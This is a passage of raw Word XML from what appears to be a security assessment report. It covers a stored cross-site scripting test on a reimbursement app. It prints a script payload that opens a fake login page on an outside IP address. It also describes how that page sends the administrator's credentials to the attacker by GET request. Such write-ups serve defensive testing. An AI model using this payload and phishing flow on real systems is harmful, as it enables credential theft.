        <w:t xml:space="preserve">rom there, </w:t>
      </w:r>
      <w:r w:rsidR="006A63A4">
        <w:t>launch a terminal</w:t>
      </w:r>
      <w:r w:rsidR="00FB4A4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00934AF5">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00FA788D">
        <w:t>set up</w:t>
      </w:r>
      <w:r w:rsidR="009D5F2E">
        <w:t xml:space="preserve"> a HTTP server using Python. Note that </w:t>
      </w:r>
      <w:r w:rsidR="00665B1C">
        <w:t xml:space="preserve">for this </w:t>
      </w:r>
      <w:r w:rsidR="00FA788D">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00665B1C">
        <w:t xml:space="preserve"> properly execute, </w:t>
      </w:r>
      <w:r w:rsidR="003E3767">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00A30C33">
        <w:t xml:space="preserve">residential gateway or </w:t>
      </w:r>
      <w:r w:rsidR="003E3767">
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidR="009922A3">
        <w:t xml:space="preserve"> must be configured for port forwarding</w:t>
      </w:r>
      <w:r w:rsidR="00FB4A4D">
        <w:t xml:space="preserve"> if connected to a </w:t>
      </w:r>
      <w:r w:rsidR="00E92883">
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidR="00FB4A4D">
        <w:t xml:space="preserve"> network</w:t>
      </w:r>
      <w:r w:rsidR="009922A3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001551A6">
        <w:t xml:space="preserve">In this case, the attacker’s web server is </w:t>
      </w:r>
      <w:r w:rsidR="00365F80">
        <w:t>hosted at port 1234.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D0D2E" w14:textId="7709F29E" w:rsidR="000B1780" w:rsidRDefault="00984D2D" w:rsidP="00212B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658302" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53AD9DF8" wp14:editId="089B8B1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>521713</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>783399</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="622689" cy="257935"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="114" name="Rectangle 114"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="622689" cy="257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66C0AD">
              <v:rect id="Rectangle 114" style="position:absolute;margin-left:41.1pt;margin-top:61.7pt;width:49.05pt;height:20.3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002D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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00212B8A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A744730" wp14:editId="49E429C5">
            <wp:extent cx="5943600" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="0"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45109"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1835150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B9601" w14:textId="77777777" w:rsidR="00CA1B16" w:rsidRDefault="00CA1B16" w:rsidP="00966EDA"/>
    <w:p w14:paraId="3B98998D" w14:textId="4051C266" w:rsidR="000B1780" w:rsidRDefault="000B1780" w:rsidP="00966EDA">
      <w:r>
        <w:t xml:space="preserve">As seen below, the payload used would </w:t>
      </w:r>
      <w:r w:rsidR="00050535">
        <w:t xml:space="preserve">launch another tab on the user’s browser to </w:t>
      </w:r>
      <w:r w:rsidR="003C556D">
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidR="00050535">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276452">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00050535">
        <w:t xml:space="preserve"> fake login page hosted on the attacker’s web server.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C645A5" w14:paraId="57A6A5A7" w14:textId="77777777" w:rsidTr="00C645A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE3F7D0" w14:textId="70F47D0E" w:rsidR="00C645A5" w:rsidRPr="00AD3A9D" w:rsidRDefault="00C645A5" w:rsidP="004C2D19">
            <w:r w:rsidRPr="00AD3A9D">
              <w:t>&lt;script&gt;window.open("http://218.212.97.196:1234/login.html")&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08661A03" w14:textId="77777777" w:rsidR="003F7C25" w:rsidRPr="00212B8A" w:rsidRDefault="003F7C25" w:rsidP="00872A37"/>
    <w:p w14:paraId="45BC879B" w14:textId="655D87B1" w:rsidR="00E36BB9" w:rsidRDefault="00B66CC7" w:rsidP="00966EDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658303" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E04A7FF" wp14:editId="1E839DA1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2193438</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>841473</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1525870" cy="314150"/>
                <wp:effectExtent l="0" t="0" r="17780" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="115" name="Rectangle 115"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1525870" cy="31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61F87B">
              <v:rect id="Rectangle 115" style="position:absolute;margin-left:172.7pt;margin-top:66.25pt;width:120.15pt;height:24.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8D52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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE7534">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="008DF77B" wp14:editId="10AF9F2F">
            <wp:extent cx="5943600" cy="2393950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>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28395"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2393950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64BFBC" w14:textId="1F42EA4E" w:rsidR="00CA1B16" w:rsidRDefault="00CA1B16" w:rsidP="00966EDA"/>
    <w:p w14:paraId="7B1AF798" w14:textId="7DC38909" w:rsidR="001D0774" w:rsidRDefault="001D0774" w:rsidP="00966EDA">
      <w:r>
        <w:t xml:space="preserve">When the </w:t>
      </w:r>
      <w:r w:rsidR="006148C9">
        <w:t xml:space="preserve">form </w:t>
      </w:r>
      <w:r w:rsidR="00FD0002">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="006148C9">
        <w:t xml:space="preserve"> saved, the payload w</w:t>
      </w:r>
      <w:r w:rsidR="003A4005">
        <w:t xml:space="preserve">ould </w:t>
      </w:r>
      <w:r w:rsidR="5725EFC2">
        <w:t>be executed</w:t>
      </w:r>
      <w:r w:rsidR="003A4005">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006148C9">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="004A50B4">
        <w:t xml:space="preserve"> seen below.</w:t>
      </w:r>
      <w:r w:rsidR="00930322">
        <w:t xml:space="preserve"> Notice the URL that points to the attacker’s public IP address on port 1234.</w:t>
      </w:r>
      <w:r w:rsidR="003E4E3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C7431">
        <w:t xml:space="preserve">Since </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D9C">
        <w:t xml:space="preserve">the reimbursement process is stored in the database where </w:t>
      </w:r>
      <w:r w:rsidR="00FA788D">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00835FDE">
        <w:t>employer</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D9C">
        <w:t xml:space="preserve"> can review the </w:t>
      </w:r>
      <w:r w:rsidR="00F70D01">
        <w:t>record</w:t>
      </w:r>
      <w:r w:rsidR="00443612">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F70D01">
        <w:t>, this payload would execute on the admin side as well.</w:t>
      </w:r>
      <w:r w:rsidR="001C7431">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E4E3F">
        <w:t xml:space="preserve">At this point, social engineering would </w:t>
      </w:r>
      <w:r w:rsidR="003A4005">
        <w:t xml:space="preserve">occur where </w:t>
      </w:r>
      <w:r w:rsidR="00F70D01">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00C6762F">
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="00F70D01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A4005">
        <w:t>unknowingly enters his</w:t>
      </w:r>
      <w:r w:rsidR="00872A37">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="003A4005">
        <w:t>her credentials into the form.</w:t>
      </w:r>
      <w:r w:rsidR="00C572F6" w:rsidRPr="00C572F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE26DC" w14:textId="516D1900" w:rsidR="00E36BB9" w:rsidRDefault="00C572F6" w:rsidP="00966EDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658305" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="792ADF7B" wp14:editId="040A943C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>712447</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>223190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="998547" cy="123416"/>
                <wp:effectExtent l="0" t="0" r="11430" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="116" name="Rectangle 116"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="998547" cy="1234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441EA6">
              <v:rect id="Rectangle 116" style="position:absolute;margin-left:56.1pt;margin-top:17.55pt;width:78.65pt;height:9.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D4A0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j8gwIAAGgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X21nSdcE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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE7534">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D104B7B" wp14:editId="1B32B816">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="203" name="Picture 20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5C529F" w14:textId="77777777" w:rsidR="00CA1B16" w:rsidRDefault="00CA1B16" w:rsidP="00966EDA"/>
    <w:p w14:paraId="0D2FB4B2" w14:textId="6CAF110D" w:rsidR="00DD1BCF" w:rsidRDefault="00DD1BCF" w:rsidP="00966EDA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The screenshot below depicts what an administrator would see</w:t>
      </w:r>
      <w:r w:rsidR="00635954">
        <w:t>. As shown, the request made earlier was stored and displayed in the records</w:t>
      </w:r>
      <w:r w:rsidR="007B2AF3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00065969" w:rsidRPr="00065969">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FFC50B" w14:textId="4FC04C03" w:rsidR="00CE7534" w:rsidRDefault="00065969" w:rsidP="00212B8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658301" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2FDF8CEC" wp14:editId="0C156FEF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1000124</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1364298</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2009775" cy="185737"/>
                <wp:effectExtent l="0" t="0" r="28575" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="18946426" name="Rectangle 18946426"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2009775" cy="1857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6B5371">
              <v:rect id="Rectangle 18946426" style="position:absolute;margin-left:78.75pt;margin-top:107.45pt;width:158.25pt;height:14.6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B70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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE7534">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F30E63C" wp14:editId="3B1BF1B8">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="204" name="Picture 20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websit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E0CD65" w14:textId="77777777" w:rsidR="007B2AF3" w:rsidRDefault="007B2AF3" w:rsidP="00212B8A"/>
    <w:p w14:paraId="50DB5096" w14:textId="15561F21" w:rsidR="007B2AF3" w:rsidRPr="00212B8A" w:rsidRDefault="000D0607" w:rsidP="00966EDA">
      <w:r>
        <w:t xml:space="preserve">The admin would also be </w:t>
      </w:r>
      <w:r w:rsidR="00D458D8">
        <w:t>prompted</w:t>
      </w:r>
      <w:r w:rsidR="00246A71">
        <w:t xml:space="preserve"> to enter </w:t>
      </w:r>
      <w:r w:rsidR="00D458D8">
        <w:t xml:space="preserve">the credentials on another page </w:t>
      </w:r>
      <w:r w:rsidR="004C725A">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00D458D8">
        <w:t xml:space="preserve"> looks legitimate. For this </w:t>
      </w:r>
      <w:r w:rsidR="00155782">
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00D458D8">
        <w:t xml:space="preserve">, no users </w:t>
      </w:r>
      <w:r w:rsidR="00810476">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00D458D8">
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidR="00810476">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="1C91DDCC">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00810476">
        <w:t xml:space="preserve"> the attack</w:t>
      </w:r>
      <w:r w:rsidR="00D458D8">
        <w:t xml:space="preserve"> as no social engineering was done</w:t>
      </w:r>
      <w:r w:rsidR="00687C47">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F04C61" w:rsidRPr="00F04C61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFF9484" w14:textId="16CEAE41" w:rsidR="00F5397A" w:rsidRDefault="00F04C61" w:rsidP="00F5397A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658307" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11FFBE05" wp14:editId="143796C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2984422</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1300261</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="959278" cy="381467"/>
                <wp:effectExtent l="0" t="0" r="12700" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="118" name="Rectangle 118"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="959278" cy="3814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F841E4">
              <v:rect id="Rectangle 118" style="position:absolute;margin-left:235pt;margin-top:102.4pt;width:75.55pt;height:30.0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A927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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658306" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CC0D862" wp14:editId="73588589">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1043426</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>172690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="959278" cy="123416"/>
                <wp:effectExtent l="0" t="0" r="12700" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="117" name="Rectangle 117"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="959278" cy="1234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0FB32D">
              <v:rect id="Rectangle 117" style="position:absolute;margin-left:82.15pt;margin-top:13.6pt;width:75.55pt;height:9.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29BD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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00212B8A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BDBB7D" wp14:editId="76ACD1FD">
            <wp:extent cx="4953481" cy="2786332"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="205" name="Picture 20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websit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99068" cy="2811974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A50EE" w14:textId="77777777" w:rsidR="00F5397A" w:rsidRDefault="00F5397A">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B69C89" w14:textId="52F26278" w:rsidR="00966EDA" w:rsidRDefault="000B2EED" w:rsidP="00F5397A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Once </w:t>
      </w:r>
      <w:r w:rsidR="003A40FE">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="008D0371">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00166C2E">
        <w:t>form on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A40FE">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="008D0371">
        <w:t xml:space="preserve"> fake website was submitted, it would send a </w:t>
      </w:r>
      <w:r w:rsidR="00A67C9A">
        <w:t>request to the attacker. As seen below, the date and time, username</w:t>
      </w:r>
      <w:r w:rsidR="00E153E9">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A67C9A">
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r w:rsidR="003A40FE">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00A67C9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007202F4">
        <w:t>collected.</w:t>
      </w:r>
      <w:r w:rsidR="004019FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E153E9">
        <w:t>Upon submission, i</w:t>
      </w:r>
      <w:r w:rsidR="00AF2043">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="004019FF">
        <w:t xml:space="preserve"> would </w:t>
      </w:r>
      <w:r w:rsidR="00AF2043">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="004019FF">
        <w:t xml:space="preserve">redirect </w:t>
      </w:r>
      <w:r w:rsidR="00933C61">
        <w:t xml:space="preserve">to the legitimate web application </w:t>
      </w:r>
      <w:r w:rsidR="00D24BF0">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00AF2043">
        <w:t>avoid</w:t>
      </w:r>
      <w:r w:rsidR="00D24BF0">
        <w:t xml:space="preserve"> suspicion.</w:t>
      </w:r>
      <w:r w:rsidR="00BF0717" w:rsidRPr="00BF0717">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF8FDA4" w14:textId="5284B23C" w:rsidR="000B2706" w:rsidRDefault="00BF0717" w:rsidP="00966EDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="264219D8" wp14:editId="348A7190">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1206110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>320172</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1441723" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="25400" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="70" name="Rectangle 70"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1441723"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15034C">
              <v:rect id="Rectangle 70" style="position:absolute;margin-left:94.95pt;margin-top:25.2pt;width:113.5pt;height:9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1A48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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00212B8A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E258FE" wp14:editId="432BFF12">
            <wp:extent cx="5943600" cy="679450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>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79677"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="679450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF7B43" w14:textId="77777777" w:rsidR="00EB6A95" w:rsidRDefault="00EB6A95" w:rsidP="00966EDA"/>
    <w:p w14:paraId="6F83B279" w14:textId="797D5C19" w:rsidR="00EB6A95" w:rsidRDefault="00EB6A95" w:rsidP="00EB6A95">
      <w:r>
        <w:t xml:space="preserve">This script was embedded onto the fake login </w:t>
      </w:r>
      <w:r w:rsidR="00501E19">
        <w:t xml:space="preserve">page </w:t>
      </w:r>
      <w:r>
        <w:t>which sends a GET request to the attacker’s web server containing the input for the username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB29E9" w14:textId="7BF683A8" w:rsidR="00EB6A95" w:rsidRDefault="00EB6A95" w:rsidP="00EB6A95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002331E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B25C07D" wp14:editId="71F91249">
            <wp:extent cx="4414177" cy="2631057"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="18946393" name="Picture 18946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93" name="Picture 18946393" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4466908" cy="2662487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F4627" w14:textId="77777777" w:rsidR="00020862" w:rsidRDefault="00020862" w:rsidP="00020862">
